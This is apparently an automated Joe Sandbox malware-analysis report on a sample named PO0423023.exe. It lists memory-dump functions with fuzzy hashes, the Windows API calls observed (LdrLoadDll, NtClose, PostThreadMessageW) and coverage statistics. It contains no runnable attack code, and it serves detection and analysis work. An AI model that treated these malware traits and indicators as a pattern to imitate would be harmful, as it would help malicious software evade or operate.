Source File: 00000000.00000002.2034961763.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_PO0423023.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: c2f7e1cb50459f8000937d9f8603bba32c1db64c3eecfb1e7d057dd0d80cc79c
Instruction ID: 4cd33630acc738c008bb91ee8a8ab47db72773c7a5d97e9407ea864268daa7d9
Opcode Fuzzy Hash: c2f7e1cb50459f8000937d9f8603bba32c1db64c3eecfb1e7d057dd0d80cc79c
Instruction Fuzzy Hash: 421103B58002499FDB10DF99D885BDEBBF8FB48324F10841AD558A7240C379A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 044D06C8 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 044D0725

Memory Dump Source

Source File: 00000000.00000002.2034961763.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_PO0423023.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 2bd85eaac2e96c9a84d2f464c0a13642007b005f6d9d4c3026f7278fced02cc7
Instruction ID: 16e215ddd0fb31e27bb5ac705cd179f9a7cefa58f16d5eec4e90af090c4e9b4c
Opcode Fuzzy Hash: 2bd85eaac2e96c9a84d2f464c0a13642007b005f6d9d4c3026f7278fced02cc7
Instruction Fuzzy Hash: 7D1100B58003489FDB10DF9AC884BDEBBF8EB48324F10841AE918A7200C379A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A9D1FC Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2030492967.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a9d000_PO0423023.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c84bd3ad4ef8eb480cac4c8396f09cf558be3e2cc0f59f77610e1dadc9ed7667
Instruction ID: 58267d4cd1384931a30d686398b19e2f03fe311542df40ae4893388c9d5dcb25
Opcode Fuzzy Hash: c84bd3ad4ef8eb480cac4c8396f09cf558be3e2cc0f59f77610e1dadc9ed7667
Instruction Fuzzy Hash: 91210371604300DFCF05DF54D9C0B66BFA5FB88314F20C569E9090B256C33AD896DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A9D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2030492967.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a9d000_PO0423023.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b53f142d40dd14da3960472bddb1c29b62519b3a932ce217f275c2a38d082c3
Instruction ID: 72246dc3580f45a777a5174f63b1952061ef48fd060b5ca513dfde72b945abbd
Opcode Fuzzy Hash: 2b53f142d40dd14da3960472bddb1c29b62519b3a932ce217f275c2a38d082c3
Instruction Fuzzy Hash: 6E21D375604204DFDF05DF14D9C0B26BFA5FBD8324F24C569E9090F25AC33AE896DAA2

Uniqueness

Uniqueness Score: -1.00%

Function 00AAD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2030546250.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aad000_PO0423023.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3424f12d19fc40c7d32932c5f9012dcd95a321ac8944980d7f422ff85f088816
Instruction ID: 1d9eef0012adc1450b7abbb1268a468de0520ea04f2c8f5bdc99c7993d6fd7a2
Opcode Fuzzy Hash: 3424f12d19fc40c7d32932c5f9012dcd95a321ac8944980d7f422ff85f088816
Instruction Fuzzy Hash: 8021F271604204DFCB15DF24D984B26BF65FB89314F20C569D98B4B696C33AD807CA61

Uniqueness

Uniqueness Score: -1.00%

Function 00AAD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2030546250.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aad000_PO0423023.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe1f8be56073fd5dccadc226c57e572519468f538364503cd379f7476da89b80
Instruction ID: 63a66e861682ee5c28ddeef07efe500e4bb223f7b68e68582a6ce6e8b5868ee2
Opcode Fuzzy Hash: fe1f8be56073fd5dccadc226c57e572519468f538364503cd379f7476da89b80
Instruction Fuzzy Hash: 41210771504204EFDB05DF14D5C0F66BB65FB85314F20C56DD98A4B696C33AD80ACA61

Uniqueness

Uniqueness Score: -1.00%

Function 00A9D1F7 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2030492967.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a9d000_PO0423023.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d06fae078f3ccc2112caf8552f6b645ede566e603d6c7b0d9faf10800b04cc1c
Instruction ID: 57912b331da0545878b5521ab627b1e766caa93172f249134f1ca0ae6c08ad4b
Opcode Fuzzy Hash: d06fae078f3ccc2112caf8552f6b645ede566e603d6c7b0d9faf10800b04cc1c
Instruction Fuzzy Hash: E121CD76504240CFCF06CF00D9C4B56BFA2FB88314F24C5A9DD080A256C33AD86ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A9D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2030492967.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a9d000_PO0423023.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: 3c479f2f4fb87fa80db71659683736e4e662e5f5e62ae94a84261e09d345539a
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: 6D11E172504240CFCF02CF00D5C4B16BFB1FB94324F24C6A9D9090B256C33AE89ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00AAD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2030546250.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aad000_PO0423023.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: 1669ae03e294c9a0102772b60490cfe9bf4ff772a1642416628f777289fa06d2
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: 8511BB75504280DFCB02CF10C5C4B15BBA1FB85314F24C6A9D88A4B6A6C33AD80ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00AAD017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2030546250.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aad000_PO0423023.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: 8cdc3029a8251a129a43715088ee3c32600d6828d7247cdf3a00183ee10013ae
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: 82119075504280DFDB16CF14D5C4B15FF71FB49314F24C6AAD88A4B696C33AD84ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A9D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2030492967.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a9d000_PO0423023.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd302876c08652aebba410e67e36e3a824482d0635e44a4306b861e10590db04
Instruction ID: 4a85965af84d5cce1fd612b353e4b6175d4d12dae256148f59a21521baf7f72a
Opcode Fuzzy Hash: fd302876c08652aebba410e67e36e3a824482d0635e44a4306b861e10590db04
Instruction Fuzzy Hash: 2C012B312043409AEB208F95CD84B67BFECEF56324F18C52AED081F286C2399880CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 00A9D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2030492967.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a9d000_PO0423023.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 091a044b4c42dea1680919313459a77820cd262a87b20a2505922a0bb0e41708
Instruction ID: c84e01b3f342dfbe3c45ecb227aa814f57fab80be37b07471ba8c6b37aaec8be
Opcode Fuzzy Hash: 091a044b4c42dea1680919313459a77820cd262a87b20a2505922a0bb0e41708
Instruction Fuzzy Hash: 64F062715043449AEB108F56C888B62FFD8EF96734F18C45AED485E286C2799844CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 09484298 Relevance: 2.8, Strings: 2, Instructions: 256COMMON

Download Yara Rule

Strings

]\`, xrefs: 0948452A
T+-q, xrefs: 094845E2

Memory Dump Source

Source File: 00000000.00000002.2040466365.0000000009480000.00000040.00000800.00020000.00000000.sdmp, Offset: 09480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9480000_PO0423023.jbxd

Similarity

API ID:
String ID: T+-q$]\`
API String ID: 0-4115924400
Opcode ID: 6068e8d62a2c84c25adda51a7c0a6b2809a417f89e4b2fa3f845ada3eb5d1c64
Instruction ID: 790155ddaa7a137a88857e375cdc8d00f41540564f2bfe93c337fd1d13af2903
Opcode Fuzzy Hash: 6068e8d62a2c84c25adda51a7c0a6b2809a417f89e4b2fa3f845ada3eb5d1c64
Instruction Fuzzy Hash: 5FB10670E1521A9FCB04DFAAD98089EFBF2BF89340B14D52AD429BB264D73099028F54

Uniqueness

Uniqueness Score: -1.00%

Function 094842A8 Relevance: 2.8, Strings: 2, Instructions: 253COMMON

Download Yara Rule

Strings

]\`, xrefs: 0948452A
T+-q, xrefs: 094845E2

Memory Dump Source

Source File: 00000000.00000002.2040466365.0000000009480000.00000040.00000800.00020000.00000000.sdmp, Offset: 09480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9480000_PO0423023.jbxd

Similarity

API ID:
String ID: T+-q$]\`
API String ID: 0-4115924400
Opcode ID: 1d75d7b0f519090280643e79e3b30e681f6f37c5fd8c7811e655a633c972674a
Instruction ID: 2e2936d9fa9ed386965f57ebe647f2059f1a4c64c35a8282203f83455be1e45c
Opcode Fuzzy Hash: 1d75d7b0f519090280643e79e3b30e681f6f37c5fd8c7811e655a633c972674a
Instruction Fuzzy Hash: 17B1F670E1521A9FCB04DFAAD98089EFBF2BF89340B14D52AD429BB264D73099028F54

Uniqueness

Uniqueness Score: -1.00%

Function 0948C978 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2040466365.0000000009480000.00000040.00000800.00020000.00000000.sdmp, Offset: 09480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9480000_PO0423023.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bb857ae541eac408cd703a97f4d23da2451a77805b50e84ea093333715f09f3
Instruction ID: b8bbf61de1f7743d6b73a86530ac50b3f937f7dce86aed65c5aea8f2e0b27a68
Opcode Fuzzy Hash: 1bb857ae541eac408cd703a97f4d23da2451a77805b50e84ea093333715f09f3
Instruction Fuzzy Hash: B2E1FA74E101198FCB14EFA9C5809AEBBF2FF49305F24816AE454AB35AD731A941CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0948CDB0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2040466365.0000000009480000.00000040.00000800.00020000.00000000.sdmp, Offset: 09480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9480000_PO0423023.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d7038b49167c6fea83b1af6b3e1c84c20b3a14b2738f5b5181ee25fdcb914b0
Instruction ID: 5994353bcb1705a1ddf352470881347339c82192223247e169c7a76c6a32b2f9
Opcode Fuzzy Hash: 5d7038b49167c6fea83b1af6b3e1c84c20b3a14b2738f5b5181ee25fdcb914b0
Instruction Fuzzy Hash: CDE12D74E111198FDB14DFA9C5809AEFBF2FF49305F24816AE404AB356D731A942CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0948AE98 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2040466365.0000000009480000.00000040.00000800.00020000.00000000.sdmp, Offset: 09480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9480000_PO0423023.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d87cc98d9e490e3a486b19bf505329fedc3de1cd58c044da0e44eca75ad24a3
Instruction ID: 715d4ec53d50f10f18b94cbd3699a546199b43cbb80c9df73413de47f6407a58
Opcode Fuzzy Hash: 5d87cc98d9e490e3a486b19bf505329fedc3de1cd58c044da0e44eca75ad24a3
Instruction Fuzzy Hash: 8BE1FC74E101198FCB14DFA9C5809AEFBF2FF89315F24826AE414AB35AD731A941CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0948D1E8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2040466365.0000000009480000.00000040.00000800.00020000.00000000.sdmp, Offset: 09480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9480000_PO0423023.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebdf7446a1dab738e9f6b91957c1ad6d436a8108a8fdd82132014e36a475d663
Instruction ID: 14c546ad77bbba0c06dd5f36eccc685e90809a001b972b3ea827f84de65e8c7e
Opcode Fuzzy Hash: ebdf7446a1dab738e9f6b91957c1ad6d436a8108a8fdd82132014e36a475d663
Instruction Fuzzy Hash: 47E1EA74E011198FCB14DFA9C5809AEFBF2FF89305F24816AE414AB39AD731A941CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0948B2D0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2040466365.0000000009480000.00000040.00000800.00020000.00000000.sdmp, Offset: 09480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9480000_PO0423023.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c52e7d6ccab169ddd2fdd3d0925a9fbb60a1367e0553388a5e4ac2ab390a29b2
Instruction ID: e70b692542ce251acd4fe00131b896cede261d1d448189d62de3c8e91ac67c4f
Opcode Fuzzy Hash: c52e7d6ccab169ddd2fdd3d0925a9fbb60a1367e0553388a5e4ac2ab390a29b2
Instruction Fuzzy Hash: 1DE1FC74E001198FCB14DF99C5809AEFBF2FF89315F64826AE414AB35AD731A981CF61

Uniqueness

Uniqueness Score: -1.00%

Function 094822B0 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2040466365.0000000009480000.00000040.00000800.00020000.00000000.sdmp, Offset: 09480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9480000_PO0423023.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19527de47eb61f0a15070a82328cec9dec84847e823e1d1ef306134977b96c89
Instruction ID: e59e3c5b44665bddd1afd917b772de41d82fc12c1374dfa85e19c95f1c0e06a3
Opcode Fuzzy Hash: 19527de47eb61f0a15070a82328cec9dec84847e823e1d1ef306134977b96c89
Instruction Fuzzy Hash: AED1F831D2075A8ACB15EFB4D994A9DB7B1FF95300F11879AD0097B214EB70AAC9CF41

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD5DC Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2030882898.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_PO0423023.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e017ed748c237fb911734cf832e2f0e8a464aec34bfc8ae2a68fb506c760524
Instruction ID: 6a20c7211e29e06a6ff4ddfc73b4bcc5386b9dfc15e0c895065b163bf524a40b
Opcode Fuzzy Hash: 3e017ed748c237fb911734cf832e2f0e8a464aec34bfc8ae2a68fb506c760524
Instruction Fuzzy Hash: B1A12B36E002068FCF05DFA5C8445EEBBF2FF85300B1585BAE906AB265DBB5E955CB40

Uniqueness

Uniqueness Score: -1.00%

Function 094822C0 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2040466365.0000000009480000.00000040.00000800.00020000.00000000.sdmp, Offset: 09480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9480000_PO0423023.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57db7bc9bf239a8a7bc07f998a2816255de77f3425fc9f81b20a49e5436ba843
Instruction ID: 7dd8b25b101242eb437e780f1b655354e0855d2ead20c49940e59e61798fa133
Opcode Fuzzy Hash: 57db7bc9bf239a8a7bc07f998a2816255de77f3425fc9f81b20a49e5436ba843
Instruction Fuzzy Hash: D7D1F931D2075A8ACB15EFB4D994A9DB7B1FF95300F11879AD0097B214EB70AAC9CF41

Uniqueness

Uniqueness Score: -1.00%

Function 09480B90 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2040466365.0000000009480000.00000040.00000800.00020000.00000000.sdmp, Offset: 09480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9480000_PO0423023.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a8f37b50a7593f13968526f5017959bc87b6901223fcccbc3374ec15b23642
Instruction ID: d78cbe553067f12c3969b19775b2093667e7bce0485e8668a33b4d9c6644976c
Opcode Fuzzy Hash: c3a8f37b50a7593f13968526f5017959bc87b6901223fcccbc3374ec15b23642
Instruction Fuzzy Hash: B4515670E1520ADFCB04DFAAD4955EEFBF2FF88310F10982AE415A7254DB749A468F90

Uniqueness

Uniqueness Score: -1.00%

Function 09480BA0 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2040466365.0000000009480000.00000040.00000800.00020000.00000000.sdmp, Offset: 09480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9480000_PO0423023.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1183358c17bd60c690cca441c71304e20342e32053f32f4930ecbf0d02164dd0
Instruction ID: 56cd3731f408932dd743d1604f22ffe69714836a77107fd771e024f861ab1baf
Opcode Fuzzy Hash: 1183358c17bd60c690cca441c71304e20342e32053f32f4930ecbf0d02164dd0
Instruction Fuzzy Hash: 72514770E1120A9FCB04DFAAD4855EEBBF2FF88310F10982AE415B7354DB749A468F90

Uniqueness

Uniqueness Score: -1.00%

Function 0948CDA0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2040466365.0000000009480000.00000040.00000800.00020000.00000000.sdmp, Offset: 09480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9480000_PO0423023.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 230379e02a62d55e274431968293dc0485e3e2bbf59ccb10b2068cc1e40d5f2f
Instruction ID: 9c0c0958960088c034ad13b253df2c90144507651339b8ca71212db969d02f94
Opcode Fuzzy Hash: 230379e02a62d55e274431968293dc0485e3e2bbf59ccb10b2068cc1e40d5f2f
Instruction Fuzzy Hash: 09513A70E002198FDB14DFA9C9805AEFBF2FF89305F24816AD408AB356D731A942CF60

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: PO0423023.exePID: 2428, Parent PID: 3648COMMON

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	5.4%
Signature Coverage:	8.5%
Total number of Nodes:	130
Total number of Limit Nodes:	8

Executed Functions

Function 004176B3 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417725

Memory Dump Source

Source File: 00000003.00000002.2489011998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_PO0423023.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 1534d4dab94937ae5feb5ecf8fff19bb62f9afaea38ffef9a0714dab75593010
Instruction ID: 2a91265cd94f82b8a90b0ac5589af7a88cb6d660ce350640a86b0babf6f55db1
Opcode Fuzzy Hash: 1534d4dab94937ae5feb5ecf8fff19bb62f9afaea38ffef9a0714dab75593010
Instruction Fuzzy Hash: 72011EB5E4020DABDF10DAE5DC42FDEB378AB54308F00419AE91897280FA75EB54CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0042B263 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?), ref: 0042B297

Memory Dump Source

Source File: 00000003.00000002.2489011998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_PO0423023.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 9f787ccbc3cff7bc2229462b8a74816a84789d61b7f0bcf32d0c621f97a323d5
Instruction ID: ac43d00b017587eaa0f2c99acff632717b88ee847b47d6ef24b20caf8d36fc33
Opcode Fuzzy Hash: 9f787ccbc3cff7bc2229462b8a74816a84789d61b7f0bcf32d0c621f97a323d5
Instruction Fuzzy Hash: 66E04F356402147BC610EA5ADC41F9BB75CDFC5754F004459FA08A7142C6717A118BF8

Uniqueness

Uniqueness Score: -1.00%

Function 01A02B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01A02B6A

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b82617884ee865f82e506ad5700e6e67bfef89da3d41816c4238568f30188b7b
Instruction ID: c83dc4205a9ccc2488157488bce9782db904f394fe0b48f070175f04bc6e7173
Opcode Fuzzy Hash: b82617884ee865f82e506ad5700e6e67bfef89da3d41816c4238568f30188b7b
Instruction Fuzzy Hash: 9F90026224240003410571584414616500A97E1241F56C021E1014590DC62989916225

Uniqueness

Uniqueness Score: -1.00%

Function 01A02DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01A02DFA

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e9159239d80417a94c17588b300123383085cb77d68ecb8baed3917e245efb3a
Instruction ID: deb40ab89a5b528aba9c3b2524e557e55b7961feaec6c069938ddd173c0741e7
Opcode Fuzzy Hash: e9159239d80417a94c17588b300123383085cb77d68ecb8baed3917e245efb3a
Instruction Fuzzy Hash: 8390023224140413D11171584504707100997D1281F96C412A0424558DD75A8A52A221

Uniqueness

Uniqueness Score: -1.00%

Function 01A02C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01A02C7A

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fbe00a3b480d2bf76781e3d244b4831350fa0c052067c31c7f644dea76526c51
Instruction ID: 08c036d7fe9aadb34272fa107234c4482d69658f048fc41578896e15570820e4
Opcode Fuzzy Hash: fbe00a3b480d2bf76781e3d244b4831350fa0c052067c31c7f644dea76526c51
Instruction Fuzzy Hash: 3D90023224148803D1107158840474A100597D1341F5AC411A4424658DC79989917221

Uniqueness

Uniqueness Score: -1.00%

Function 01A035C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01A035CA

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5f9ca542dc688b55e0e6b840179443d0bd97e7d5e94e1af4e36c77b53477aa2a
Instruction ID: 96ba6c4b2d6d3e3d719a8c08a3b791630517078f0efd4811a7bf73b89d405685
Opcode Fuzzy Hash: 5f9ca542dc688b55e0e6b840179443d0bd97e7d5e94e1af4e36c77b53477aa2a
Instruction Fuzzy Hash: EB90023264550403D10071584514706200597D1241F66C411A0424568DC7998A5166A2

Uniqueness

Uniqueness Score: -1.00%

Function 00413C5F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(43PI9J,00000111,00000000,00000000), ref: 00413D5A

Strings

43PI9J, xrefs: 00413D4F, 00413D59, 00413D6A
43PI9J, xrefs: 00413D61, 00413D64

Memory Dump Source

Source File: 00000003.00000002.2489011998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_PO0423023.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 43PI9J$43PI9J
API String ID: 1836367815-3851319958
Opcode ID: 04bd63cef658dae42d1dfcbc382defe338c7367c7877dffac2daf233f9d3fcea
Instruction ID: bcfe7294399c8e5330b980c9ccd23c718b2973277ca8e0702e339b43b5528ea5
Opcode Fuzzy Hash: 04bd63cef658dae42d1dfcbc382defe338c7367c7877dffac2daf233f9d3fcea
Instruction Fuzzy Hash: AA2149B1E0024CBADB209BF59C42DDF7F7CDF41268F44415AFA50AB241D6684E0A87A5

Uniqueness

Uniqueness Score: -1.00%

Function 00413CE1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(43PI9J,00000111,00000000,00000000), ref: 00413D5A

Strings

43PI9J, xrefs: 00413D4F, 00413D59, 00413D6A
43PI9J, xrefs: 00413D61, 00413D64

Memory Dump Source

Source File: 00000003.00000002.2489011998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_PO0423023.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 43PI9J$43PI9J
API String ID: 1836367815-3851319958
Opcode ID: fbfffa7d31d38b797df6e5e1c6aad4c013dc1041716bfeaec18e3793ff31599c
Instruction ID: c2aa92412ef98179fb8ebff923fd0c8e55063f930a6349ae58d638fccc42bbfa
Opcode Fuzzy Hash: fbfffa7d31d38b797df6e5e1c6aad4c013dc1041716bfeaec18e3793ff31599c
Instruction Fuzzy Hash: 8001C8B2E4011C7EDB10AAE5AC82DEF7B7CDF41754F40806AFA14B7141D5785F068BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00413CE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
